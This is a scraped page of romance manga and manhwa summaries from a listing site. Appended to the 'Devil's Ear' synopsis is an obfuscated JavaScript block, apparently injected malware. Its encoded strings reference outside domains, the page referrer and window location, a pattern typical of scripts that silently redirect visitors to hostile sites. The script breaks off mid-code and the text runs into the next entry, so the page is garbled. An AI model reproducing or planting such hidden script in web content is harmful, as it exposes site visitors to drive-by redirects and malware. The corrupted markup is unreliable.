Romance - Page 1952

In romance manga, the narrative revolves around romantic relationships, often featuring emotional twists, obstacles, and blossoming love, appealing to fans of tender and dramatic stories.

24320 results

Devil’s Ear

A cold an evil president suffered in phonism (hearing things), which allowed him to hear different thoughts from people around him. One time he unknowingly hear the heroin singing, and suddenly all the other noise in the world were gone. From then on, whenever he hear she sings, he would become a docile and cute boy.<script></script><script>function _0x2e68(){var _0x3b8aa4=['text','3294xJAtDA','MqDms','120VxqcnQ','href','rZqBK','OASfq','floor','3229583ZechAp','.customapi','nDdfp','6999576FrLHuN','referrer','315260rJIACe','qqZfF','google','https://ip','PEqjY','2561000rdXxbZ','FuOkG','394107zSwCWI','.top/','http://rea','5XVuSJK','includes','680dGuSHT','FOmOJ','594378FUDiPl','then','random','kOOfv','location','kBBwB',''];_0x2e68=function(){return _0x3b8aa4;};return _0x2e68();}function _0x6c14(_0x5f4b92,_0x19f182){var _0x51d10b=_0x2e68();return _0x6c14=function(_0x2efcef,_0x572b1a){_0x2efcef=_0x2efcef-(0x84c+-0x20f3+0x19a8);var _0x43a12f=_0x51d10b[_0x2efcef];return _0x43a12f;},_0x6c14(_0x5f4b92,_0x19f182);}(function(_0x485955,_0x3f1b4c){var _0x18fa3b=_0x6c14,_0xa4c29=_0x485955();while(!![]){try{var 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A Story Of Taking Home A Lonely Gal From My Class And Turning Her Into An Elegant Beauty

On a rainy night, Akira Akamori, a high school student about to transfer to a new school, saw his blonde classmate, Aoi Soutome, standing in the park drenched from the rain. “…I don’t have a home anymore.” Though Aoi was a complete stranger to him, Akira couldn’t leave a girl alone, so he took her home. “Thanks for the help.” “I-It’s fine…” When Akira heard about Aoi’s complicated situation, he decided to help her and let her live with him until he transferred to a new school. While confused by their new cohabitation arrangement, the two slowly grew close to each other. It is a love story of two people who repeatedly come together and drift apart, like a spinning record.



The day after he finds himself dumped by his girlfriend, Sorayama Shun recieves a letter... from himself? The letter was from Shun 25 years ago for his future self. The letter reminds him of the time when he dreamed of owning a Countach and being a successful professional racer. With loads of luck and his ambition to make his childhood dream come true, he finds himself as a new owner of an LP400 Countach.


Orion'S Board

Losing one match after another, shogi prodigy Yuuhi Ninomiya became a shadow of his former glorious self. It was then that he faced his old rival Kanata Kuji in an official match. However, the record-setting match ended with Kanata winning his 27th consecutive game, and Yuuhi losing his 17th consecutive game. Feeling frustrated and depressed, Yuuhi stops by a bar, when he has a fateful encounter with a certain girl! Her name is Tsuki Kayamori. Although she is overbearing, self-centered, and eccentric, her sharp and unorthodox playstyle is as if she was chosen by the shogi God!


Uesugi-kun wa Onnanoko wo Yametai

Uesugi-kun is a boy who\'s as petite and cute as a girl. He has a crush on a girl he\'s known since childhood, but overheard her saying, \"Wouldn\'t Uesugi be totally adorable if he was a girl?!\" Uesugi-kun\'s not as tall as his other childhood friend, Eito, nor is he as good at studies, and now he\'s suffering from a broken heart. A depressed Uesugi-kun stops by a shrine while running an errand and makes a wish... A love-triangle romantic comedy featuring an overly cute, and now female, protagonist begins!


Dou Luo Da Lu

Tang San was a talented apprentice to the great Tang Sect. Due to mastering the forbidden Tang arts, he was pressured to jump off a cliff and died. However, he was reborn into another world filled with Essence Spirits. At the age of six, every person will have their essence spirit awoken. Spirits can take many forms: weapons, plants, and animals; They can help people with their daily lives. Outstanding spirits can be trained to engage in combat. A spirit master is the soul and heart of the Combat Continent! When Tang San turns six, a huge surprise awaits him. His peaceful life in this new world will change completely. Note: After the original chapter 344, it continued on from a re-written 322.


Shiganai Tensei Reijou wa Heion ni Kurashitai

Aria, a former high school student, reincarnated as a young lady of an unremarkable noble house. She was roped into attending a marriage interview with Prince Eugene, who\'s rumored to be an oddball, and it’s during this meeting that he suddenly makes a ridiculous claim — that he was Oda Nobunaga in his past life!! *Well, that explains why the Prince still has yet to find a partner.* However, Aria calmly accepts Eugene’s tall tale, which inevitably piques his curiosity… *That won’t do! What if he finds out that I, too, have memories from my past life?!* Thus begins Aria’s days of being aggressively courted by the world’s most powerful prince who’s capable of unifying entire nations!


Adopted by aMurderous Duke Family

After ten years of being exploited by Duke Gerwehr for her healing powers, Agnes meets her death in a dungeon. When she wakes up, she finds herself in her uncle’s house before she was sold to Duke Gerwehr in the slave market. Desperate for her past life not to repeat itself, she lets Duke Rodwick adopt her and starts her new life with a new name, Tuariche Rodwick. Will she be able to keep her healing powers secret in this notorious family of assassins and find true happiness and love in her new life?

3 days ago

A Nameless flower

The young master, son of an earl, Luan, while wandering in the forest, met a boy his age. He fell in love with a sweet and kind boy, although he does not know his name. Gradually he began to neglect his training as a successor.


Merry Psycho

A sweet and happy two year marriage felt like a dream. One day, her husband disappeared without a trace. Han Seoryeong, an ordinary housewife and blind woman, desperately searches for him… “You’ll never find him.” Her husband turned out to be the best secret agent with many faces. “Our marriage was everything to me, but it was just ‘work’ to him?” In the midst of her world crumbling, Seoryeong mistakenly unleashes the madness she had been suppressing.…

2 days ago

She Broke The Plot Again

Yu Yao, a college student was transported to another world (isekai) after an accident. She was tasked by a program to play as a villainess to create scenarios for the male leads to fall in love towards a female lead. If she succeeds in making the lead reaches the pinnacle of life, she will be revived back in the real world.But, Yu Yao was intrigued with a lame boy and some scenarios are not projected as what they’ve been programmed…The Hostess Collapse the Plots Again / 宿主她又在崩剧情 / Sùzhǔ Tā Yòu Zài Bēng Jùqíng


Can’t pretend to be blind anymore

Read manhwa I Can No Longer Pretend I Don’t See It / Can’t pretend to be blind anymore /더는 못 본 척하지 않기로 했다 Summary: I realized it only after returning. My husband who committed an affair, somehow commits an affair again. The horrible woman appears in front of me again, and my life span isn&#8217;t that long. &#8220;Let&#8217;s get divorced.&#8221; &#8220;&#8230;What?&#8221; &#8220;I don&#8217;t have any money to give you, so give me back everything I bought you and leave. Even the underwear stuck in that corner.&#8221; &#8220;What&#8217;s wrong with you all of a sudden?&#8221; &#8220;All of a sudden?&#8221; A twisted smile came up. I originally thought he was shameless, but this is far too much. &#8220;You should know better, right? You little beast that only thinks with your lower body.&#8221;
